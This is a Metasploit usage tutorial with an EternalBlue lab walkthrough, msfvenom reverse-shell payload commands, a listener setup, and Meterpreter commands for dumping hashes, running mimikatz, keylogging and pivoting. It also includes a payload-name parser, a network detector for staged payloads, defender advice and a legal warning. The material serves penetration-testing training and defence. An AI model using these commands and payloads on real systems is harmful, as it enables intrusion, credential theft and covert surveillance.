Metasploit Framework is the open-source offensive framework that pentesters and red teamers worldwide use as a common language. From vulnerability validation to exploit execution, payload generation, and post-exploitation, the entire flow is driven from a single interface. This article is built around one goal: making you actually able to use the tool. Commands and hands-on practice are the focus.
What Metasploit is #
Metasploit Framework is an open-source offensive framework used for penetration testing and vulnerability validation. The core value is not "write an exploit from scratch every time" but the ability to invoke known exploits / payloads / post-modules from a unified interface.
Bundled by default in Kali Linux and Parrot OS, and a required practical skill in certifications like OSCP and CEH, it is the de facto "first offensive tool you ever touch".
Started in 2003 by HD Moore in Perl → fully rewritten in Ruby in v3.0 (2007) → acquired by Rapid7 in 2009 and actively developed ever since.
What it can do #
- Vulnerability scanning (auxiliary modules)
- Exploitation of known CVEs (thousands of exploit modules)
- Payload generation (msfvenom — exe / elf / php / shellcode and more)
- Post-exploitation (info gathering, lateral movement, privilege escalation via Meterpreter)
- Listener / handler (catching reverse connections)
Launch and database initialization #
On Kali it's preinstalled. Initialize the database once on first use and you unlock the result-management commands hosts / services / vulns later on.
```
$ sudo msfdb init      # start PostgreSQL + create DB (first time only)
$ msfconsole           # launch the interactive shell

       =[ metasploit v6.x.x-dev ]
+ -- --=[ 2300+ exploits - 1200+ auxiliary - 410+ post ]
+ -- --=[ 950+ payloads - 45+ encoders - 11+ nops ]

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
```
help prints the built-in command list, search finds modules, and use selects one. These three already cover most of what you need.
The basic workflow (five steps) #
Just about every Metasploit-driven attack fits into the same five-step shape.
1. Discover: db_nmap stores results directly in the msf database.
2. Select: search to find an exploit matching the CVE or service.
3. Configure: use the module → show options → set RHOSTS / LHOST / PAYLOAD.
4. Execute: check first to confirm the vulnerability is present, then exploit.
5. Post: session acquired.
The module hierarchy #
Every capability is packaged as a "module". They live in a tree under /usr/share/metasploit-framework/modules/.
| Type | Role | Representative example |
|---|---|---|
| exploit | Abuse a vulnerability to gain code execution | exploit/windows/smb/ms17_010_eternalblue |
| auxiliary | Helpers — scanning, brute force, listeners | auxiliary/scanner/portscan/tcp |
| payload | Code that runs on the target after a successful exploit | windows/x64/meterpreter/reverse_tcp |
| post | Post-exploitation automation (recon / lateral / persistence) | post/multi/recon/local_exploit_suggester |
| encoder | Transform shellcode to evade static signatures | x86/shikata_ga_nai |
| evasion | Generate executables with AV-evasion built in | windows/windows_defender_exe |
The three payload structures #
- single (inline) — one self-contained binary. Big, but stable.
- stager — a tiny stub that downloads the real payload over the network. Useful when the exploit has tight buffer constraints.
- stage — the real payload that the stager loads. Meterpreter works through this mechanism.
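The single/staged split is visible in the payload name itself. As an added example (not code from the article or from Metasploit), this parser applies the framework's naming convention: a staged payload ends in two components, `<stage>/<stager>` (windows/x64/meterpreter/reverse_tcp), while a single payload fuses them with an underscore in the last component (linux/x86/shell_reverse_tcp). The architecture list is an assumed subset, and cmd/* and generic/* payloads are deliberately rejected because they use other layouts.

```python
"""Classify a Metasploit payload name as staged or single (inline).

Rule applied (the framework's naming convention): a staged payload ends in
two components, <stage>/<stager>, e.g. windows/x64/meterpreter/reverse_tcp;
a single payload fuses them with "_" in one component, e.g.
linux/x86/shell_reverse_tcp. cmd/* and generic/* payloads follow other
layouts and are rejected here.
"""
from dataclasses import dataclass
from typing import Optional

# Architecture tokens that may follow the platform (assumed, common subset).
ARCHES = {"x64", "x86", "aarch64", "armle", "mipsle", "mipsbe", "ppc"}


@dataclass(frozen=True)
class PayloadInfo:
    platform: str
    arch: Optional[str]
    stage: str        # what ends up running: meterpreter, shell, ...
    stager: str       # how it arrives: reverse_tcp, bind_tcp, reverse_https, ...
    staged: bool      # True = stager fetches the stage, False = single/inline
    direction: str    # "reverse" (calls out), "bind" (listens) or "unknown"


def parse_payload(name: str) -> PayloadInfo:
    parts = name.strip("/").split("/")
    platform, rest = parts[0], parts[1:]
    if platform in ("cmd", "generic") or not rest:
        raise ValueError(f"layout not covered by this parser: {name!r}")
    arch = rest.pop(0) if rest[0] in ARCHES else None
    if len(rest) == 2:                       # <stage>/<stager>  -> staged
        stage, stager, staged = rest[0], rest[1], True
    elif len(rest) == 1 and "_" in rest[0]:  # <stage>_<stager>  -> single
        stage, stager = rest[0].split("_", 1)
        staged = False
    else:
        raise ValueError(f"unrecognised payload layout: {name!r}")
    if stager.startswith("reverse_"):
        direction = "reverse"
    elif stager.startswith("bind_"):
        direction = "bind"
    else:
        direction = "unknown"
    return PayloadInfo(platform, arch, stage, stager, staged, direction)
```

The direction field matters on the defensive side: a reverse stager means an outbound connection that egress filtering and flow logging can see.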
Essential msfconsole commands #
The minimum set worth committing to memory. These cover roughly 95% of day-to-day usage.
```
# search
msf6 > search ms17_010
msf6 > search type:exploit platform:windows

# module selection (the index from search results also works)
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 > use 0
msf6 > back                      # go back one level

# inspect
msf6 > info
msf6 > show options
msf6 > show payloads
msf6 > show targets

# parameter setting
msf6 > set RHOSTS 192.168.56.50
msf6 > set LHOST eth0            # interface name is accepted
msf6 > setg LHOST 10.0.2.4       # global setting (applies to all modules)

# execute
msf6 > check                     # pre-flight the vulnerability
msf6 > exploit
msf6 > exploit -j -z             # run in background
msf6 > run                       # synonym for exploit
```

```
# sessions and jobs
msf6 > sessions -l               # list
msf6 > sessions -i 1             # attach to ID=1
meterpreter > background         # Ctrl+Z also works, returns to console
msf6 > sessions -K               # kill all sessions
msf6 > jobs -l
msf6 > jobs -K
```

```
# workspace and database
msf6 > workspace -a redteam      # create a workspace
msf6 > db_nmap -sS 192.168.56.0/24
msf6 > hosts                     # discovered hosts
msf6 > services                  # discovered services
msf6 > vulns                     # candidate vulnerabilities
msf6 > loot                      # collected files
```
Hands-on — EternalBlue (MS17-010) #
The SMB v1 vulnerability used by the 2017 WannaCry ransomware. Unpatched Windows 7 and Server 2008 R2 boxes are sitting ducks, making this a classic exercise — featured in HackTheBox Blue and the OSCP labs.
STEP 1 — Reconnaissance #
```
$ nmap -p 445 --script smb-vuln-ms17-010 192.168.56.50
PORT    STATE SERVICE
445/tcp open  microsoft-ds
| smb-vuln-ms17-010:
|   VULNERABLE: Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
```
STEP 2 — Module search #
```
msf6 > search ms17_010
Matching Modules
   #  Name
   0  exploit/windows/smb/ms17_010_eternalblue
   1  exploit/windows/smb/ms17_010_psexec
   2  auxiliary/scanner/smb/smb_ms17_010
```
STEP 3 — Configure + check #
```
msf6 > use 0
msf6 exploit(ms17_010_eternalblue) > set RHOSTS 192.168.56.50
msf6 exploit(ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(ms17_010_eternalblue) > set LHOST 192.168.56.106
msf6 exploit(ms17_010_eternalblue) > check
[+] 192.168.56.50:445 - Host is likely VULNERABLE to MS17-010!
```
STEP 4 — Execute #
```
msf6 exploit(ms17_010_eternalblue) > exploit
[*] Started reverse TCP handler on 192.168.56.106:4444
[*] 192.168.56.50:445 - ...exploitation successful...
[*] Sending stage (200774 bytes) to 192.168.56.50
[*] Meterpreter session 1 opened

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM     # SYSTEM in one shot
meterpreter > sysinfo
Computer    : DC01
OS          : Windows 7 (6.1 Build 7601, SP1)
Architecture: x64
```
The SMB service runs in the kernel (srv.sys). Since the exploit targets a vulnerability in the SMB driver itself, the shellcode runs with SYSTEM privileges from the very first instruction. Unlike userland exploits, there is no follow-up privilege-escalation step needed.
Payload generation with msfvenom #
A standalone payload-generation tool. Use it when you want to produce an exe / elf / php / shellcode locally and deliver it through another channel — file upload, email attachment, USB, and so on.
Key options #
- -p <payload> — payload name
- LHOST= / LPORT= — reverse-connection destination (use =, not set)
- -f <format> — output format (exe / elf / raw / php / c, etc.)
- -e <encoder> / -i <count> — encoder + number of iterations
- -b '\x00\x0a\x0d' — exclude bad chars
- -o <file> — output destination
Common combinations #
```
# Windows Meterpreter exe
$ msfvenom -p windows/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f exe -o shell.exe

# Linux ELF
$ msfvenom -p linux/x64/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f elf -o shell.elf

# PHP web shell
$ msfvenom -p php/meterpreter/reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -f raw -o shell.php

# C shellcode (for BoF experiments, with bad chars excluded)
$ msfvenom -p linux/x86/shell_reverse_tcp \
    LHOST=192.168.56.106 LPORT=4444 \
    -b '\x00\x0a\x0d' -f c
```
The receiver side — multi/handler #
To catch the reverse connection from a generated payload, stand up multi/handler.
```
msf6 > use exploit/multi/handler
msf6 exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf6 exploit(handler) > set LHOST 192.168.56.106
msf6 exploit(handler) > set LPORT 4444
msf6 exploit(handler) > exploit -j     # listen in background
```
Encoders like shikata_ga_nai only defeat static signatures. Modern EDR catches binaries via behavioral analysis, sandboxing, and memory scanning, so anything msfvenom generates directly should be treated as "will be detected immediately".
Meterpreter #
Meterpreter is Metasploit's signature payload. It is memory-resident, uses encrypted communications, runs cross-platform, and supports dynamic module loading. Because it never drops a binary on disk it is harder for AV to see, and feature-wise it is in a different league from a raw reverse shell.
Frequently used commands #
```
meterpreter > sysinfo            # OS / architecture
meterpreter > getuid             # current user
meterpreter > ps                 # process list

# Windows privilege escalation
meterpreter > getsystem          # attempt elevation to SYSTEM
meterpreter > hashdump           # dump SAM hashes (requires SYSTEM)
meterpreter > load kiwi          # load mimikatz functionality
meterpreter > kiwi_cmd "sekurlsa::logonpasswords"
```

```
# files, processes, surveillance
meterpreter > download /etc/shadow
meterpreter > upload payload.exe C:\\Windows\\Temp\\
meterpreter > migrate 1234       # jump to another process (evasion / privilege change)
meterpreter > screenshot         # capture the screen
meterpreter > keyscan_start      # start keylogger
meterpreter > keyscan_dump
meterpreter > shell              # spawn a native cmd / sh
```
Pivoting — into the internal network #
Using a compromised host as a stepping stone, you can route scans and exploits into internal IP segments that would otherwise be unreachable.
```
meterpreter > run autoroute -s 10.0.0.0/24
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(tcp) > set RHOSTS 10.0.0.5
msf6 auxiliary(tcp) > run        # scan 10.0.0.5 through the compromised host
```
The defender's perspective and ethics #
Metasploit is an offensive tool, but it is equally a validation tool for "does this actually work against my environment?". Required reading for blue teams too.
What the defender should do #
- Don't sit on known CVEs — most Metasploit exploits target known CVEs, and patching kills most of them.
- Keep EDR current — Meterpreter's reflective DLL injection is detectable by modern EDR.
- Disable SMBv1 / LLMNR / NetBIOS — these are the breeding ground for EternalBlue and Responder-style attacks.
- LAPS / JIT administration — block lateral movement that relies on reused passwords.
- Centralize logs in SIEM — detect anomalous PowerShell, new processes, and unusual SMB access.
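The handler caveat above (encoders beat signatures, not behaviour) and the SIEM bullet point the same way: the network side of a staged reverse payload is noisy. As an added example that is not part of the article or of any product, this detector walks constructed Zeek-style connection records and flags egress flows with the two page-level tells: the default multi/handler port 4444, and a stager that sends a few bytes and immediately receives a stage-sized push (the "Sending stage (200774 bytes)" step). The log layout, address ranges and byte thresholds are assumptions chosen for the example.

```python
"""Flag conn-log flows that look like a staged reverse payload calling home.
Built from two page facts: multi/handler listens on 4444 by default, and the
listener pushes a ~200 KB Meterpreter stage right after the stager connects
("Sending stage (200774 bytes)"). Log layout, thresholds, ranges are assumptions."""
from __future__ import annotations
import csv, io, ipaddress
from dataclasses import dataclass

INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("192.168.56.0/24", "10.0.0.0/8")]
DEFAULT_HANDLER_PORTS = {4444}                          # Metasploit's default LPORT
COMMON_EGRESS_PORTS = {80, 443, 53, 22, 25, 587, 993}   # assumed egress allow-list
STAGE_MIN_BYTES = 100_000                               # a stage dwarfs a server banner
STAGER_MAX_BYTES = 2_000                                # the stager sends only a few bytes

# Constructed Zeek-style conn records (not real traffic).
SAMPLE_LOG = """\
ts,id.orig_h,id.resp_h,id.resp_p,orig_bytes,resp_bytes
1700000000,192.168.56.50,203.0.113.10,4444,312,200774
1700000003,192.168.56.51,198.51.100.20,443,1530,48211
1700000005,192.168.56.52,203.0.113.10,8443,140,184320
1700000009,192.168.56.53,192.168.56.106,445,980,640
"""

@dataclass(frozen=True)
class Finding:
    orig: str
    resp: str
    port: int
    reasons: tuple[str, ...]

def is_internal(ip: str) -> bool:
    return any(ipaddress.ip_address(ip) in net for net in INTERNAL_NETS)

def score_flow(row: dict) -> Finding | None:
    orig, resp, port = row["id.orig_h"], row["id.resp_h"], int(row["id.resp_p"])
    sent, recv = int(row["orig_bytes"]), int(row["resp_bytes"])
    if not is_internal(orig) or is_internal(resp):     # only egress flows matter here
        return None
    reasons = []
    if port in DEFAULT_HANDLER_PORTS:
        reasons.append("default Metasploit handler port")
    # A few client bytes answered by a stage-sized server push = stager pulling its stage.
    # Allow-listed ports (e.g. reverse_https over 443) need TLS-aware inspection instead.
    if port not in COMMON_EGRESS_PORTS and sent <= STAGER_MAX_BYTES and recv >= STAGE_MIN_BYTES:
        reasons.append("small client hello followed by stage-sized server push")
    return Finding(orig, resp, port, tuple(reasons)) if reasons else None

def detect(log_text: str) -> list[Finding]:
    return [f for f in map(score_flow, csv.DictReader(io.StringIO(log_text))) if f]
```

Changing LPORT defeats only the first rule; the byte-ratio rule is what survives a renamed port, which is why the second finding in the sample carries a single reason.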
Running Metasploit against systems you don't own, without permission, is a crime. In Japan this falls under the Unauthorized Computer Access Act and the Penal Code (obstruction of business by damaging electronic computers).
Use is limited to:
- Environments you own (home LAN / self-built VMs / HackTheBox / VulnHub)
- Penetration tests with written authorization (a signed contract with the client)
- CTFs (only where the organizer has explicitly authorized attacks)
"I just want to try a PoC", "on my friend's server", "on a coworker's PC" — all unacceptable.
Summary #
- Metasploit moves in five steps: discover → select → configure → execute → post
- The main UI is msfconsole, standalone payloads come from msfvenom, results are managed by msfdb
- Meterpreter is a memory-resident stealth shell; migrate / hashdump / autoroute are the post-exploitation workhorses
- In the EDR era, assume raw msfvenom output gets detected; serious evasion is the domain of other frameworks (Sliver, Cobalt Strike, etc.)
- Use it only on authorized environments — if you can't honor that rule, don't touch it